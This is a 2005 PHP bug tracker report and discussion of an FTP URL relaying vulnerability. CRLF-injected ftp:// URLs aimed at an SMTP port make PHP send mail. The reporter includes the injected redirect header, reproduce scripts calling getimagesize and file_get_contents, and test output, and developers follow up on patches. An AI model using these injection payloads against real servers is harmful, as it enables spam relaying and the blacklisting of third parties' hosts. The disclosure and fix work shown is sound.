php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #32936 FTP URL relaying vulnerability
Submitted: 2005-05-04 00:33 UTC Modified: 2005-05-07 02:12 UTC
From: herbert dot groot dot jebbink at gmail dot com Assigned: pollita
Status: Closed Package: FTP related
PHP Version: 5.0.4 OS: Linux
Private report: No CVE-ID:
 [2005-05-04 00:33 UTC] herbert dot groot dot jebbink at gmail dot com
Description:
------------
See http://dsbl.org/relay-methods#FTPURL for more details.

A exploit can be found at http://dividedsky.net/gfx/badges

This URL gives the next result.

HTTP/1.x 302 Found
Date: Tue, 03 May 2005 21:43:41 GMT
Server: Apache/2.0.53 (Debian GNU/Linux) PHP/4.3.10-10
Content-Location: badges.php
Vary: negotiate
TCN: choice
X-Powered-By: PHP/4.3.10-10
Location:
ftp://foo%0D%0AMAIL%20FROM%3A<>%0D%0ARCPT%20TO%3A<listme%40listme.dsbl.org>%0D%0ADATA%0D%0ASubject%3A%20DSBL%20Submission%0D%0ATo%3A%20listme%40listme.dsbl.org%0D%0A%0D%0ADSBL%20LISTME%3A%20ftp-url%20%5B82.197.205.88%5D%3A80%0D%0AVv%2FcqZoUAlAyMb9O2R+Xu0YSwQNRN5DL%0D%0Adividedsky.net%20website%20hit%0D%0ADSBL%20END%0D%0A.%0D%0A:bar@mx.listme.dsbl.org:25/
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1


Reproduce code:
---------------
<?php

  // DO NOT RUN THIS CODE

  // YOUR SERVER WILL BE LISTED ON DSBL.ORG

  // RESULTING IN POSSIBLE REJECTS OF YOUR EMAILS

  $check = getimagesize('http://dividedsky.net/gfx/badges') ;

?>



Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2005-05-05 04:42 UTC] pollita@php.net
Interresting...
 [2005-05-05 12:18 UTC] herbert dot groot dot jebbink at gmail dot com
"Interresting" was not the word that I used when I found out that my server was blacklisted as a spam machine and my emails where rejected by many mailservers. 

My bot that is written in PHP was trapped in the given exploit.
 [2005-05-06 04:24 UTC] iliaa@php.net
This bug has been fixed in CVS.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.
 
Thank you for the report, and for helping us make PHP better.


 [2005-05-06 22:24 UTC] herbert dot groot dot jebbink at gmail dot com
Thanks for the patch, however, IMHO the patch should not be applied in the HTTP wrapper to check a redirect but in the FTP wrapper. That way it will also work in the below situation, where PHP is still tricked to send a mail.

  $ftp = 'ftp://foo%0D%0AMAIL%20FROM%3A&amp;lt;&amp;gt;%0D%0ARCPT%20TO%3A&amp;lt;listme%40listme.dsbl.org&amp;gt;%0D%0ADATA%0D%0ASubject%3A%20DSBL%20Submission%0D%0ATo%3A%20listme%40listme.dsbl.org%0D%0A%0D%0ADSBL%20LISTME%3A%20ftp-url%20%5B82.197.205.88%5D%3A80%0D%0AvIHU%2FRSZHzlaqPF5ZUxHqE5nj79uL4sg%0D%0Adividedsky.net%20website%20hit%0D%0ADSBL%20END%0D%0A.%0D%0A:bar@mx.listme.dsbl.org:25/';

  $check = file_get_contents($ftp);
 [2005-05-07 00:28 UTC] iliaa@php.net
the patch was applied in 2 places, the HTTP redirect handling and FTP wrapper.
 [2005-05-07 02:12 UTC] herbert dot groot dot jebbink at gmail dot com
I did test both ways before sending my previous comment, PHP stops now a 302 redirect, but the direct FTP way still results in sending a email. (there is a warning "failed to open stream: Operation now in progress" but the email is send)

linux:/home/hgj # cat test.php
<?php

  $http = 'http://dividedsky.net/gfx/badges' ;
  $ftp  = 'ftp://foo%0D%0AMAIL%20FROM%3A&amp;lt;&amp;gt;%0D%0ARCPT%20TO%3A&amp;lt;listme%40listme.dsbl.org&amp;gt;%0D%0ADATA%0D%0ASubject%3A%20DSBL%20Submission%0D%0ATo%3A%20listme%40listme.dsbl.org%0D%0A%0D%0ADSBL%20LISTME%3A%20ftp-url%20%5B82.197.205.88%5D%3A80%0D%0AvIHU%2FRSZHzlaqPF5ZUxHqE5nj79uL4sg%0D%0Adividedsky.net%20website%20hit%0D%0ADSBL%20END%0D%0A.%0D%0A:bar@mx.listme.dsbl.org:25/';

  $check = getimagesize($http);
  $check = file_get_contents($ftp);

?>

linux:/home/hgj # /usr/local/bin/php --version
PHP 5.0.5-dev (cgi) (built: May  6 2005 20:58:59)
Copyright (c) 1997-2004 The PHP Group
Zend Engine v2.0.4-dev, Copyright (c) 1998-2004 Zend Technologies

linux:/home/hgj # /usr/local/bin/php test.php
Content-type: text/html
X-Powered-By: PHP/5.0.5-dev

<br />
<b>Warning</b>:  getimagesize(http://dividedsky.net/gfx/badges) [<a href='function.getimagesize'>function.getimagesize</a>]: failed to open stream: Invalid redirect url! ftp://foo%0D%0AMAIL%20FROM%3A&amp;lt;&amp;gt;%0D%0ARCPT%20TO%3A&amp;lt;listme%40listme.dsbl.org&amp;gt;%0D%0ADATA%0D%0ASubject%3A%20DSBL%20Submission%0D%0ATo%3A%20listme%40listme.dsbl.org%0D%0A%0D%0ADSBL%20LISTME%3A%20ftp-url%20%5B82.197.205.88%5D%3A80%0D%0AkeiEBtjqp2q0dV13uGVlTPl8xWpobZPF%0D%0Adividedsky.net%20website%20hit%0D%0ADSBL%20END%0D%0A.%0D%0A:bar@mx.listme.dsbl.org:25/ in <b>/home/hgj/test.php</b> on line <b>6</b><br />
<br />
<b>Warning</b>:  file_get_contents(ftp://...@mx.listme.dsbl.org:25/) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: Operation now in progress in <b>/home/hgj/test.php</b> on line <b>7</b><br />

After a minute or so you can see the result at the dsbl.org website :-) In my case it it is the below url:

http://dsbl.org/listing?82.197.205.88
 
PHP Copyright © 2001-2014 The PHP Group
All rights reserved.
Last updated: Fri Apr 18 08:02:55 2014 UTC